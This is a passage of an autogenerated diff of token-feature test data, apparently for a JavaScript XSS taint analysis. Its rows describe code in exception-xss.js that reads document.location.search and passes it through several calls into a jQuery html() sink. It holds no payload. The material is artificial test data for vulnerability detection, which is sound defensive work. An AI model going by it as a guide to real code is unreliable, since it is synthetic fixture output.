autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:19 | document | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:19 | document | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:28 | document.location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:28 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:28 | document.location | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:28 | document.location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:28 | document.location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:35 | documen ... .search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:35 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:35 | documen ... .search | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:35 | documen ... .search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:12:199:35 | documen ... .search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:21:199:28 | location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:21:199:28 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:21:199:28 | location | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:21:199:28 | location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:21:199:28 | location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:30:199:35 | search | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:30:199:35 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:30:199:35 | search | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:30:199:35 | search | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:199:30:199:35 | search | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:8 | Object | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:8 | Object | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:8 | Object | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:8 | Object | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:8 | Object | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:15 | Object.assign | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:15 | Object.assign | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:15 | Object.assign | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:15 | Object.assign | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:15 | Object.assign | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | Object. ... o, foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | Object. ... o, foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | Object. ... o, foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | Object. ... o, foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | Object. ... o, foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | exceptional return of Object. ... o, foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | exceptional return of Object. ... o, foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | exceptional return of Object. ... o, foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | exceptional return of Object. ... o, foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:3:203:25 | exceptional return of Object. ... o, foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:10:203:15 | assign | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:10:203:15 | assign | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:10:203:15 | assign | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:10:203:15 | assign | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:203:10:203:15 | assign | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:203:17:203:19 | foo | CalleeFlexibleAccessPath | Object.assign | | autogenerated/Xss/ExceptionXss/exception-xss.js:203:17:203:19 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:203:17:203:19 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19460,6 +131382,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:203:22:203:24 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:203:22:203:24 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:203:22:203:24 | foo | receiverName | Object | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:3 | _ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:3 | _ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:3 | _ | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:3 | _ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:3 | _ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:8 | _.pick | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:8 | _.pick | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:8 | _.pick | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:8 | _.pick | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:8 | _.pick | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | _.pick(foo, foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | _.pick(foo, foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | _.pick(foo, foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | _.pick(foo, foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | _.pick(foo, foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | exceptional return of _.pick(foo, foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | exceptional return of _.pick(foo, foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | exceptional return of _.pick(foo, foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | exceptional return of _.pick(foo, foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:3:204:18 | exceptional return of _.pick(foo, foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:5:204:8 | pick | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:5:204:8 | pick | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:5:204:8 | pick | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:5:204:8 | pick | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:204:5:204:8 | pick | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:204:10:204:12 | foo | CalleeFlexibleAccessPath | _.pick | | autogenerated/Xss/ExceptionXss/exception-xss.js:204:10:204:12 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:204:10:204:12 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19476,6 +131423,51 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:204:15:204:17 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:204:15:204:17 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:204:15:204:17 | foo | receiverName | _ | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:12 | [foo, foo] | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:12 | [foo, foo] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:12 | [foo, foo] | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:12 | [foo, foo] | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:12 | [foo, foo] | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:17 | [foo, foo].join | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:17 | [foo, foo].join | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:17 | [foo, foo].join | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:17 | [foo, foo].join | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:17 | [foo, foo].join | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | [foo, f ... n(join) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | [foo, f ... n(join) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | [foo, f ... n(join) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | [foo, f ... n(join) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | [foo, f ... n(join) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | exceptional return of [foo, f ... n(join) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | exceptional return of [foo, f ... n(join) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | exceptional return of [foo, f ... n(join) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | exceptional return of [foo, f ... n(join) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:3:205:23 | exceptional return of [foo, f ... n(join) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:4:205:6 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:9:205:11 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:14:205:17 | join | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:14:205:17 | join | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:14:205:17 | join | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:14:205:17 | join | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:205:14:205:17 | join | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:205:19:205:22 | join | CalleeFlexibleAccessPath | ?.join | | autogenerated/Xss/ExceptionXss/exception-xss.js:205:19:205:22 | join | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:205:19:205:22 | join | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19483,6 +131475,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:205:19:205:22 | join | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:205:19:205:22 | join | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:205:19:205:22 | join | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:3 | $ | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:7 | $.val | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:7 | $.val | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:7 | $.val | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:7 | $.val | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:7 | $.val | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | $.val(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | $.val(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | $.val(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | $.val(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | $.val(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | exceptional return of $.val(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | exceptional return of $.val(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | exceptional return of $.val(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | exceptional return of $.val(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:3:206:12 | exceptional return of $.val(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:5:206:7 | val | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:5:206:7 | val | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:5:206:7 | val | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:5:206:7 | val | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:206:5:206:7 | val | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:206:9:206:11 | foo | CalleeFlexibleAccessPath | $.val | | autogenerated/Xss/ExceptionXss/exception-xss.js:206:9:206:11 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:206:9:206:11 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19491,6 +131508,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:206:9:206:11 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:206:9:206:11 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:206:9:206:11 | foo | receiverName | $ | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:6 | JSON | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:6 | JSON | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:6 | JSON | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:6 | JSON | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:6 | JSON | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:12 | JSON.parse | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:12 | JSON.parse | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:12 | JSON.parse | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:12 | JSON.parse | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:12 | JSON.parse | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | JSON.parse(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | JSON.parse(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | JSON.parse(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | JSON.parse(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | JSON.parse(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | exceptional return of JSON.parse(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | exceptional return of JSON.parse(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | exceptional return of JSON.parse(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | exceptional return of JSON.parse(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:3:207:17 | exceptional return of JSON.parse(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:8:207:12 | parse | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:8:207:12 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:8:207:12 | parse | 